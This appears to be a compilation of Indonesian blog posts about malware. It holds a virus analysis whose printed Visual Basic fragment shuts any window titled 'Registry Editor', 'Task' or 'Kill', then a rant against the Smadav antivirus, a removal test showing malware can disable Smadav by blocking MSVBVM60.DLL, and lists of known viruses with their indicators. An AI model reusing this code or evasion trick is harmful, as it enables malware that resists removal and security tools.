If InStr(tampung, "Registry Editor") <> 0 Or InStr(tampung, "Application Data") <> 0 Or
InStr(tampung, "WINDOWS") <> 0_
Or InStr(tampung, "WINNT") <> 0 Or InStr(tampung, "Program Files") <> 0 Or
InStr(tampung, "Command Prompt") <> 0_
Or InStr(tampung, "DOS") <> 0 Or InStr(tampung, "Task") <> 0 Or InStr(tampung,
"Process") <> 0 Or InStr(tampung, "System") <> 0_
Or InStr(tampung, "Hijack") <> 0 Or InStr(tampung, "Kill") <> 0 Then
CloseWindow GetForegroundWindow
End If
End Sub
----------------------------Cut Here---------------------------------
>Sebagai Virus pasti Diary.Exe juga memerlukan suatu method Autorun
saat komputer Boot. Virus ini menggunakan key di
HKLM\Software\Microsoft\Windows\CurrentVersion\Run dengan
value NvsSchd dan berisi data %Program Files%\Common
Files\System\Explorer.exe.
>Karena ketidaksempurnaan dalam penulisan program, maka virus ini
hanya dapat berjalan di sistem operasi Windows XP, 2000 atau 2003. Virus
ini berukuran sekitar 60 Kb dan yang telah dikompresi berukuran 20 Kb
dengan menggunakan kompresi UPX.
$API Functions List...
>GetSystemDirectory
GetWindowText
GetDesktopWindow
GetTopWindow
CloseWindow
GetWindowText
GetForegroundWindow
FindWindow
SendMessage
$Advantages N Disadvantages...
>Virus berukuran cukup kecil
>Selain mem-blok akses, juga me-minimize window-window
>Virus tidak dapat berjalan di Windows 9x dan Me
>Teknik search file masih menggunakan FSO dan WSH
>Menghapus file korban
56
$End...
>Diary.Exe dapat dikatakan salah satu virus lokal berbahaya karena
menghapus file-file MS-Word di Komputer yang terinfeksi. Penyebaran
virus ini masih rendah, Media penyebarannya melalui Disket dan USB
Drive. Teknik searching file .Doc menggunakan teknik file scripting
object. Dan implementasi Key Registry menggunakan teknik Windows
Scripting.
Demikian artikel sederhana ini, kurang atau lebihnya saya mohon maaf....

SMADAV ? ANTIVIRUS atau VIRUS ?

SMADAV KEBANGGAAN ANAK INDONESIA

Wah judulnya merangsang banget nih. Buat yang pakai antivirus itu aku minta maaf ya! Ini cuma pendapatku dan pengalamanku saja kalo emang smadav tu nyebelin banget. Fuih dendam dah aku ama antivirus ini. Kenapa? Nyimak dulu dah pengalamanku tentang smadav!

Sekilas keren, smadav bikinan orang indonesia. Hehehe kalo beneran bagus aku sebenarnya tertarik makai karena yah menghargai produk bikinan anak bangsa lah. Tapi belum sempat makai dah dendam dulu. Aku cinta flashdiskku. Di flashdisk selalu ada software-software aneh dan ada juga portable apps dari portableapps.com buat keperluan mendadak. Nah suatu hari aku ngeprint karena yah biasa lah orang kere ga punya printer. Betapa kagetnya aku di flashdissku ditemukan virus sama smadav. Ampun dah, virus itu ada di portableapps ama di foler yang buat aku naruh sopwer-soper anehku. Ya ampun aku kira itu beneran virus. Nah sampe di rumah aku test sopwer yang dari portableapps di flashdisku ga bisa. Wah sial aku kira itu bener-bener virus. Ternyata cuma asa hapus aja. Abis itu aku install ulang dah sopwer dari portableapps. Aku scan di berbagai antivirus update ga ada virusnya (kaspersky, nod32, avira). Yup aku yakin ga ada virusnya dan ternyata eh ternyata saat aku ngeprint lagi dihajar lagi dah flashdiskku pakek smadav. Wah gila tu antivirus! Kenapa sih nyebelin banget?

Itu alasan pertama aku benci antivirus itu. Alasan kedua adalah file autorun.inf dah. Emang sih biasanya virus nama filenya autorun.inf aku setuju. Tapi apa semua file yang bernama autorun.inf adalah virus? Wah sial tuh antivirus. Selain hapus file-file yang ada di portableaps ternyata dia juga hapus autorun.inf di flashdiskku. Padahal kan itu aku pakek buat ganti icon. Sebenarnya dihapus ga masalah sih, tapi masalah yang bikin aku sakit hati adalah dia bikin proteksi bikin folder namanya aneh yaitu autorun.inf, zzzzz.zzz ama yang satunya lupa. Tu ga bisa dihapus semua. Terpaksa dah aku buka linux buat hapus folder itu. Nah baru bisa dah bikn file autorun.infnya. Nah yang bikin aku tambah marah adalah aku ga bisa bikin autorun.inf buat bikin icon flashdiskku lagi gara-gara antivirus sialan itu. Fuih sial kenapa sih ada yang makek antivirus jelek ikek gitu aja bikin emosi aja. Aman tapi tak beretika itu lah smadav.

Nah tapi apa smadav dijamin aman? Ga juga tuh flashdisk temenku pakek smadav banyak banget virusnya discan di komputerku. Nah kalo antivirus jelek tak beretika kek giru siapa ya yang makek? Tapi kenapa ya masi ada juga gitu yang makek. Aduh-aduh parah dah smadav. I hate smadav! Jadi setiap aku ngeprint harus buka linux ama install ulang. Wah Parah! Yang makek smadav sory yah! Aku cuma share isi hatiku aja nih!

neh cek sendiri kelemahan SMADAV :

1. SMADAV tidak mampu membaca virus yang dienscript
2. SMADAV tidak memiliki database yang eksternal
3. SMADAV memakai unicode namun lemah di file unicode
4. SMADAV memiliki folder "nul" yg mencegah scaning AV lain
5. SMADAV belum memiliki fitur RTP (Real-Time Protection) yang berfungsi untuk menjaga komputer setiap saat agar tidak terinfeksi virus
6. Database SMADAV yang sebenarnya hanya ratusan
7. Not Eye Catching and User Frendly
8. Sering Sekali False Alarm (Salah Deteksi) dan Salah Tanggap
9. Mengacaukan Registry Editor
10. Tidak Ada Fitur "Create Hand Stick"
11. selanjutnya akan dipostingin lebih lanjut....he.3x

silahkan di liat juga yach..

Smadav 2010 Rev. 8.0 terbaru saya dapat langsung dari situsnya yang berupa file ZIP. Berikut adalah isi paket file nya:

* Smadav 2010 Rev. 8.0.exe

* Readme.txt

File utamanya adalah Smadav 2010 Rev. 8.0.exe. Saya sudah cek update, dan ternyata file/database Smadav yang saya miliki sudah up-to-date. Selanjutnya, file tersebut saya jalankan pada komputer yang telah terinfeksi oleh 3 malware yang saya siapkan sebelumnya. Namun alangkah terkejutnya, saya mendapati bahwa ternyata Smadav tidak bisa dijalankan, dan muncul pesan error sebagai berikut:

Smadav error MSVBVM60.DLL

Error ini diakibatkan karena Smadav tidak menemukan file MSVBVM60.DLL pada system. Karena Smadav masih dibuat menggunakan Visual Basic, file MSVBVM60.DLL dibutuhkan oleh aplikasi VB untuk dapat berjalan dengan baik, karena file ini berisikan run-time library yang dibutuhkan oleh aplikasi tersebut. Trik untuk menghapus atau mem-block file ini sebenarnya sudah sangat sering diterapkan oleh beberapa malware, salah satu contohnya adalah Brontok. Tentu saja, dalam kasus ini file tersebut telah di-block oleh Brontok sebagai pertahanan dirinya.

Sebenarnya ini adalah error yang sangat fatal untuk Smadav, dan ini merupakan ancaman yang sangat serius untuk Smadav. Ini bisa saja dimanfaatkan oleh seorang pembuat malware untuk melakukan blocking terhadap file MSVBVM60.DLL, maka Smadav pun tidak dapat dijalankan. Semoga pembuatnya peduli akan hal ini, dan segera mencari solusinya.

Seharusnya ini sebagai pertanda bahwa Smadav tidak bisa melanjutkan ke tahap berikutnya dikarenakan error tersebut. Begini, saya mencoba memposisikan diri sebagai orang yang sangat awam mengenai komputer, dan komputer terinfeksi oleh malware, dan pada saat menjalankan antivirus, kita mendapati pesan error tersebut, sehingga antivirus tidak bisa dijalankan. Apa yang akan dilakukan selanjutnya? :)

Namun, setelah saya merundingkan masalah ini, akhirnya saya memutuskan untuk memberi kesempatan pada Smadav untuk terus meneruskan pengujian ini.

Lalu apa yang harus dilakukan jika Anda menemui masalah seperti itu?

Silakan Anda copy file MSVBVM60.DLL dari komputer lain, file tersebut lazimnya terdapat pada C:\Windows\System32\. Lalu, tempatkan file tersebut pada direktori Smadav. Maka seharusnya, Smadav akan dapat berjalan normal (Berharap semoga malware-nya tidak lagi memblock file tersebut. Karena ada beberapa malware yang akan tetap mem-block file ini bagaimanapun caranya).

Setelah saya copy kan file yang dimaksud, kini Smadav dapat berjalan normal. Layar pertama yang muncul menunjukan bahwa Smadav telah mendeteksi kehadiran dari virus:

Smadav Alert

Setelah itu ia melakukan scan otomatis dan mendeteksi beberapa virus, yang menyatakan bahwa telah terdeteksi virus di komputer tersebut namun Smadav telah berhasil membersihkannya. Sepertinya Smadav melakukan tugasnya dengan baik:

Smadav Alert

Semua virus terdeteksi telah di-fix, lalu muncul peringatan seperti ini, yang mengharuskan kita melakukan scan secara menyeluruh. Seperti yang telah dikatakan sebelumnya, saya akan melakukan semua hal yang dianjurkan oleh antivirus yang saya uji.

Smadav Alert 3

Beberapa saat kemudian, proses scanning selesai, dan menampilkan layar seperti di bawah ini yang menyatakan bahwa proses full scan telah selesai dan berhasil membasmi virus tersebut.

Smadav Scanning Finished

Dan berikut adalah cuplikan laporan dari hasil scan:

Smadav Scanning Results

Sesuai SOP atau Standar Operation Procedure saya, komputer tersebut saya restart setelah selesai membasmi virus/malware. Lalu, kini barulah saya melakukan evaluasi terhadap apa yang dilakukan oleh Smadav.

Results

Hasil dari uji coba Smadav cukup mengejutkan, tidak seperti yang saya harapkan, dan ini semua diluar dugaan. Mengapa? Karena Smadav tidak berhasil dalam uji coba kali ini. Ia gagal dalam membasmi dua virus berikut ini:

* Email-Worm.Win32.Brontok.n (alias RontokBro, Brontok, MyBro). POINT 0 [FAILED]

* Net-Worm.Win32.Kido.ih (alias Conficker, Downadup, Kido). Point 0 [FAILED]

Ia hanya berhasil membasmi satu malware saja, yakni:

* IM-Worm.Win32.Sohanad.bm (alias Autoit, Sohanad, Hakaglan, YahLover, SillyFDC). Point: 15 [PASSED]

Dalam setiap pengujian yang saya lakukan. Inilah yang saya maksud “berhasil” dan “tidak berhasil“:

* Berhasil: Jika malware tersebut tidak aktif lagi, dengan kata lain, memory telah bersih, begitu juga dengan semua file malware yang terdapat di komputer tersebut telah hilang. Maka dari itu saya melakukan restart setelah system berhasil dibersihkan, untuk mencari tau apakah malware tersebut aktif lagi apa tidak. Jika antivirus berhasil mendeteksi file malware, tapi ia tidak bisa melakukan disinfeksi malware tersebut di memory, sudah sangat dipastikan bahwa antivirus tersebut tidak mampu mengatasi malware tersebut. Dan apabila antivirus dapat membasmi malware, tetap masih menyisakan traces atau jejak yang tidak berbahaya yang ditinggalkan oleh malware tersebut, ini masih dianggap berhasil.

* Tidak berhasil: Jika malware masih aktif setelah komputer dibersihkan, atau bahkan antivirus tidak mendeteksi malware tersebut.

Dalam pengujian, Smadav tidak mendeteksi secara akurat file virus Email-Worm.Win32.Brontok.n (alias Brontok), tapi engine heuristic berhasil mendeteksi virus tersebut, dengan codename “New Heuristic (172)“, namun ternyata masih gagal dalam proses disinfeksi. Untuk Net-Worm.Win32.Kido.ih (alias Conficker), Smadav berhasil mendeteksi file malware secara tepat dengan nama “Conficker”, namun ia gagal dalam melakukan disinfeksi Conficker secara menyeluruh terutama di memory.

Berikut adalah cuplikan process dari Brontok yang masih aktif:

Smadav Process Explorer

Traces:

Traces atau jejak dari virus yang masih tertinggal, seperti file pendukung, registry, file hosts, dan lain sebagainya:

* Email-Worm.Win32.Brontok.n: All traces [FAILED]

* Net-Worm.Win32.Kido.ih: All traces [FAILED]

* IM-Worm.Win32.Sohanad.bm: No traces. [SUCCESS]

Bagaimana saya menilai?

Masing – masin malware yang saya uji memiliki point masing – masing tergantung tingkat kesulitan dan kompleksitasnya:

* IM-Worm.Win32.Sohanad.bm = 15

* Email-Worm.Win32.Brontok.n = 35

* Net-Worm.Win32.Kido.ih = 50

Apabila Antivirus tersebut berhasil membasmi ketiganya, maka akan mendapat point 100. Dan apabila proses pembasmian suatu malware dikatakan berhasil, namun masih menyisakan traces atau jejak yang ditinggalkan malware, walau dianggap berhasil, namun nilai akan dikurangi 5 untuk tiap malware yang masih tersisa traces-nya.

Untuk itu, nilai pengujian kali ini untuk Smadav adalah: 15

Conclusion

Sungguh disayangkan bagi Smadav yang merupakan antivirus yang paling banyak digemari oleh masyarakat Indonesia (sesuai hasil research saya), namun tidak berhasil dalam membasmi malware seperti yang telah saya uji. Worm lokal sekelas Brontok, yang kenyataannya sudah lama menyebar luas, yang secara teori seharusnya Smadav mampu membersihkannya, namun ternyata gagal. Kalau yang terjadi pada Conficker, saya tidak terlalu kaget, karena dari awal Smadav memang menyatakan tidak mampu dalam membasmi malware yang datang dari luar Indonesia. Alasan ketidakmampuan ini saya belum dapat pastikan, apakah karena memang kurangnya sampel virus atau dari segi teknis antivirus itu sendiri. Saya perlu adakan research tersendiri atas hal ini.

neh daftar virus yang bikin SMADAV KO !

10 virus luar

1.Storm Worm

Muncul taon 2006, disebut “Storm Worm” karena nyebar via email dengan judul “230 dead as storm batters Europe”. Storm worm adalah program Trojan house. beberapa versinya bisa buat komputer menjadi bots. Atau biasa digunakan hacker untuk spam mail melalui internet.

2. Leap-A/Oompa- A

Mac yang punya konsep security through obscurity yakin tidak akan terserang virus karena OS nya sistem tertutup. Tapi tahun 2006, virus Leap-A atau biasa disebut Oompa-A muncul. Nyebar lewat iChat pada Mac. Setelah Mac terserang, virus itu akan mencari kontak melalui iChat dan kirim pesan ke tiap kontak itu. Pesannya itu berisi file corrupt yang berbentuk JPEG. Memang tidak berbahaya, namun hal ini menyatakan bahwa masih mungkin akan ada virus berbahaya yang menyerang MAC.

3. Sasser and Netsky

Penciptanya anak Jerman umur 17 tahun, Sven Jaschan. Sasser nyerang Microsoft Windows. Sasser ini ga nyebar via email. Tapi jika satu komputer koneksi ke komputer yang kena virus ini. Virus ini bikin komputer tidak bisa di-shutdown tanpa cabut power. Netsky nyebar melalui email dengan 22 Kb attachment file dan jaringan Windows. Bisa bikin serangan DoS. Sven Jaschan tidak dipenjara hanya diberi masa percobaan 1 taon 9 bulan, karena umurnya masih di bawah 18 taon.

4. MyDome (Novarg)

Mulai nyerang tanggal 1 Februari 2004, virus ini buat backdoor di OS. Pertama kali tanggal 1 itu mulai DDoS. Kedua, tanggal 12 Feb, virus ini berhenti menyebar dan mulai buat backdoors. MyDoom menyebar via email, selain itu selalu search di search engines, seperti Google mulai menerima jutaan permintaan pencarian dan bikin lambat sampai akhirnya crash. Gara2 MyDoom, Senator US Chuck Schumer mengajukan pembuatan National Virus Response Center.

5.SQL Slammer/Saphire

Muncul Januari 2003, nyebar cepet lewat internet. Waktu itu bikin layanan ATM Bank Amerika crash, ancurnya layanan 911 Seattle, dan Continental Airlines membatalkan beberapap penerbangan karena eror check in ama tiketing. Bikin rugi lebih dari $1 milliar sebelum dipacthed.

6.Nimda

Ini juga tahun 2001, kebalikan dari kata “admiN”. Penyebarannya sangat cepat, menurut TruSecure CTO Peter Tippet, Nimda hanya butuh 22 menit buat menjadi Top Ten saat itu. Target nya server2 Internet, menyebar lewat Internet. Nimda akan ngebuat backdoor ke OS. jadi penyerang bisa akses ke server dan berbuat apa saja Nimda juga menjadi DDoS.

7.Code Red & Code Red II

Muncul musim panas 2001, nyerang OS Windows 2000 & NT. Virusnya bakal bikin buffer penuh jadi ngabisin memori. Paling seru waktu berhubungan ama White House, semua komputer yang kena virus ini bakalan otomatis akses ke web server di White House barengan, jadi bikin overload, alias serangan DDoS. Akhirnya Microsoft rilis patchnya saat itu.

8.The Klez

Nongol taon 2001, menyebar via email, replikasi trus kirim ke orang2 di address book. Bikin komputer ga bisa beroperasi, bisa berhentiin program antivirus.

9.ILOVEYOU

Abis “Melissa”, muncul dia dari Filipina, bentuk nya worm, program standalone dapat me-replikasi sendiri. Menyebar via email, judulnya”surat cinta” dari pengagum rahasia . Original file nya LOVE-LETTER- FOR-YOU.TXT. vbs. VBS singkatan Visual Basic Scripting. Penciptanya adalah Onel de Guzman dari Filipina.

10.Melissa

Dibikin taon 1999 sama David L Smith, basicnya Microsoft Word macro. Menyebar via email dengan dokumen “Here is that document you asked for, don’t show it to anybodey else.”. Kalau sampe dibuka, virus akan replikasi dan otomatis ngirim ke top 50 di address book email. Smith dipenjara 20 bulan ama denda $5000 dan melarang akses komputer tanpa pengawasan.

For Update . . .

9 Virus Lokal 

1. Windx-Maxtrox

Virus yang dibuat dengan Visual Basic ini memiliki ukuran tubuh asli sekitar 77Kb, tanpa di-pack. Virus yang diduga kuat berasal dari daerah Sulawesi Utara ini memiliki kemampuan infeksi file executable. Tepatnya, ia akan menginfeksi program yang ada di direktori Program Files. Teknik infeksi yang cukup cerdik ia terapkan untuk menghindari pendeteksian engine heuristic dari antivirus. Ciri khas yang dapat dikenali pada komputer terinfeksi adalah berubahnya gambar wallpaper dari desktop menjadi gambar animasi.

2. Autoit varian

Ciri khas virus yang satu ini adalah dibuat menggunakan program automation scripting. Yang jika di compile menjadi sebuah file executable, yang juga di-pack menggunakan UPX. Dan hampir 90% virus autoit beserta semua varian yang saya miliki, menggunakan icon mirip folder dalam penyamarannya. Virus ini juga biasanya akan membuat sebuah file autorun.inf pada saat menyerang disk drive ataupun flash drive.

3. Malingsi

Virus bertubuh gemuk dengan ukuran 705.312 bytes ini dibuat menggunakan Visual Basic yang di-pack menggunakan PECompact. Sepertinya virus ini ditujukan untuk menyerang virus lain, ini terlihat dari pesan yang ada di tubuhnya. Virus ini berkembang biak dan menyebar menggunakan perantara mIRC, yang bertindak sebagai Bot.

4. Recycler varian

Yang menjadi ciri khas dari virus ini adalah teknik bagaimana ia menyebar. Dari semua varian yang saya miliki, cara yang dilakukannya adalah sama, yakni menyamar seperti layaknya Recycle Bin. Contohnya disaat virus ini menyerang flash disk. Di flash disk korban akan terdapat folder dengan nama Recycler yang di dalamnya terdapat folder yang menggunakan nama alpha numeric contohnya “S-1-5-21-1482476501-1644491937-682003330-1013″ dengan icon mirip dengan icon Recycle Bin. Jika folder ini di-klik atau diakses dari Explorer, file virus tidak akan nampak. Untuk melihatnya, Anda bisa masuk ke command prompt dengan perintah “dir /a”.

5. Fdshield

Virus yang dibuat menggunakan bahasa Delphi ini menggunakan icon yang menyerupai Internet Explorer. Memiliki ukuran file sebesar 553.472 bytes, tanpa di-pack. Satu hal yang mencolok dari virus ini adalah dari nama yang digunakan saat menyebar, yang bertuliskan “17++ Sexs & Rahasia Wanita artis Indonesia (foto2_kamera tersembunyi_liputan).exe”. Bagi user yang tidak hati – hati, akan menyangka file tersebut merupakan file HTML. Jika Anda lihat pada direktori C:\Windows\System32, akan ditemukan sebuah file induk dengan nama “rundl32.exe”. Jangan tertipu lagi! Itu bukanlah file bagian dari Windows, tapi itu memang adalah file virus. Perhatikan huruf “L” yang cuma satu. Dan sekarang lihat pada Schedule Task, ada Job baru dengan nama “Windows FD Shield” yang akan mengeksekusi file virus diwaktu yang telah ia tentukan.

6. Purwo variant

Satu lagi varian baru, Purwo.C, masih dibuat menggunakan Visual Basic, dengan badan berukuran sekitar 56KB, murni tanpa di-pack. Virus ini menggunakan icon mirip dokumen Word milik MsOffice untuk menipu calon korbannya. Saat menginfeksi ia menciptakan sebuah folder dengan nama “Purwokerto Under Cover” yang diberi attribut hidden, dan berisi sebuah file bernama “KoruptorPurwokerto.exe” pada setiap drive yang ia temukan. Di dalam folder C:\Windows\System32\system juga ada file windowss.exe, dan di C:\Windows\javaa\service.exe. Di waktu tertentu ia akan menampilkan layar hitam yang berisi teks pesan dari pembuatnya. Dan hati-hati, virus ini juga akan menghapus beberapa file milik Anda yang ia temui.

7.Formalin

Icon yang digunakan oleh virus ini menyerupai layaknya folder, dan ia dibuat menggunakan Visual Basic. Pada Formalin.D, ukuran filenya sebesar 18.432 bytes, dengan kondisi di-pack menggunakan UPX. Virus ini menciptakan folder “samaran” dengan nama seperti Bocoran soal UAN dan UAS, My Completed Downloads, Wallpaper Picture, krack Program, Jgn dibuka !!!, Nitip Data (jgn dihapus), dan lain sebagainya. Pada komputer terinfeksi, caption di Internet Explorer akan berubah menjadi “Your computer has been infected virus Formalin”. Ia juga mencoba untuk melumpuhkan “safe-mode” dengan cara menghapus beberapa registry terkait. Dan pada file properties sang virus, di bagian description milik version information akan ada tulisan seperti “Kasian dch loe”.

8. Raider.vbs variant

Virus jenis VBScript ini jika file virusnya dibuka dengan Notepad, tidak banyak string yang bisa dibaca karena dalam kondisi ter-enkripsi. Ini sudah menjadi kebiasaan dalam setiap variannya. Biasanya, pada Registry, ia akan memberikan pengenal dengan membuat key baru di HKLM\Software dengan nama sama seperti nama pada computer name, dengan isinya berupa string value seperti nama virus tersebut, Raider, serta tanggal komputer tersebut kali pertama terinfeksi.

9. Autorunme variant

10. Rieysha variant